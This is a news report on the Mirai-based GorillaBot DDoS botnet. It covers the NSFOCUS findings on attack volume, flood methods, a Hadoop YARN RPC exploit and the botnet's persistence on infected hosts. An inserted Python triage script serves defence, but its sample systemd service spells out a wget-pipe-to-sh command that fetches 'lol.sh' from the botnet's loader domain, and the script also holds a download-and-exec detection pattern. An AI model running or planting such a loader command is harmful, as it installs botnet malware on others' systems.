Cybersecurity experts have uncovered a fresh botnet malware family known as Gorilla (also referred to as GorillaBot), which is based on the leaked source code of the infamous Mirai botnet.
The cybersecurity firm NSFOCUS announced its findings last month, revealing that the Gorilla botnet “issued more than 300,000 attack commands, showcasing an alarming level of attack density” during the period between September 4 and September 27, 2024. On average, the botnet launched at least 20,000 commands per day aimed at executing distributed denial-of-service (DDoS) attacks.
This botnet is reported to have launched attacks across over 100 countries, targeting sectors such as education, government, telecommunications, banking, gaming, and gambling. The countries most affected include China, the U.S., Canada, and Germany.
According to the Beijing-based company, Gorilla primarily employs techniques like UDP floods, ACK BYPASS floods, Valve Source Engine (VSE) floods, SYN floods, and ACK floods to carry out DDoS assaults. They noted that the connectionless nature of the UDP protocol facilitates arbitrary source IP spoofing, helping to generate substantial volumes of traffic.
In addition to supporting various CPU architectures, including ARM, MIPS, x86_64, and x86, the botnet is capable of connecting to one of five predefined command-and-control (C2) servers to await further DDoS commands.
Interestingly, the malware contains features designed to exploit a vulnerability in Apache Hadoop YARN RPC to gain remote code execution. This flaw has been exploited in the wild since at least 2021, as reported by Alibaba Cloud and Trend Micro.
To maintain persistence on infected hosts, the botnet creates a service file named custom.service in the “/etc/systemd/system/” directory, ensuring it runs automatically whenever the system starts.
This service is responsible for fetching and executing a shell script (“lol.sh”) from a remote location (“pen.gorillafirewall[.]su”). Additionally, commands are inserted into the “/etc/inittab,” “/etc/profile,” and “/boot/bootcmd” files, which trigger the download and execution of the shell script upon system startup or user login.
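A host-triage check for the persistence artifacts described above, added here as an example and not taken from NSFOCUS or the article: it reads the four boot/login locations the report names and flags the loader domain, the lol.sh script name, or a generic fetch-and-pipe-to-shell pattern. The regexes, function names and the embedded sample file contents are assumptions constructed for the example; the de-fanged domain spelling is accepted alongside the live one so the sample stays de-fanged.

```python
"""Triage helper: flag the GorillaBot persistence artifacts described in the report."""
import re
from pathlib import Path

# Persistence locations named in the NSFOCUS report.
PERSISTENCE_PATHS = [
    "/etc/systemd/system/custom.service",
    "/etc/inittab",
    "/etc/profile",
    "/boot/bootcmd",
]

# Indicators from the report. The domain pattern matches both the live
# spelling and the de-fanged "[.]" form used in write-ups (assumed regexes).
INDICATORS = [
    ("gorilla_loader_domain", re.compile(r"pen\.gorillafirewall(\[\.\]|\.)su", re.I)),
    ("gorilla_loader_script", re.compile(r"\blol\.sh\b")),
    # Generic: download piped straight into a shell from a boot or login file.
    ("download_and_exec", re.compile(r"\b(curl|wget)\b[^\n|;]*\|\s*(ba)?sh\b")),
]


def scan_content(path, text):
    """Return (path, indicator_name) pairs for every indicator found in text."""
    return [(path, name) for name, rx in INDICATORS if rx.search(text)]


def scan_files(contents):
    """contents: mapping of path -> file text, so the check also runs offline."""
    findings = []
    for path, text in contents.items():
        findings.extend(scan_content(path, text))
    return findings


def read_persistence_files(paths=PERSISTENCE_PATHS):
    """Read the real files on a live host; missing or unreadable files are skipped."""
    out = {}
    for p in paths:
        try:
            out[p] = Path(p).read_text(errors="replace")
        except OSError:
            continue
    return out


# Constructed sample mirroring the described artifacts (not captured from a real host).
SAMPLE = {
    "/etc/systemd/system/custom.service": (
        "[Unit]\nDescription=custom\n[Service]\n"
        "ExecStart=/bin/sh -c 'wget -qO- http://pen.gorillafirewall[.]su/lol.sh | sh'\n"
        "[Install]\nWantedBy=multi-user.target\n"
    ),
    "/etc/profile": "export PATH=/usr/local/bin:$PATH\n",  # benign, must not fire
}

if __name__ == "__main__":
    for path, hit in scan_files(read_persistence_files() or SAMPLE):
        print(f"{path}: {hit}")
```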
NSFOCUS emphasized that the botnet not only introduced a variety of DDoS attack methods but also utilized encryption techniques commonly associated with the Keksec group to obscure key information. It employed multiple strategies to retain long-term control over IoT devices and cloud hosts, showcasing a heightened awareness of counter-detection as this new botnet family emerges.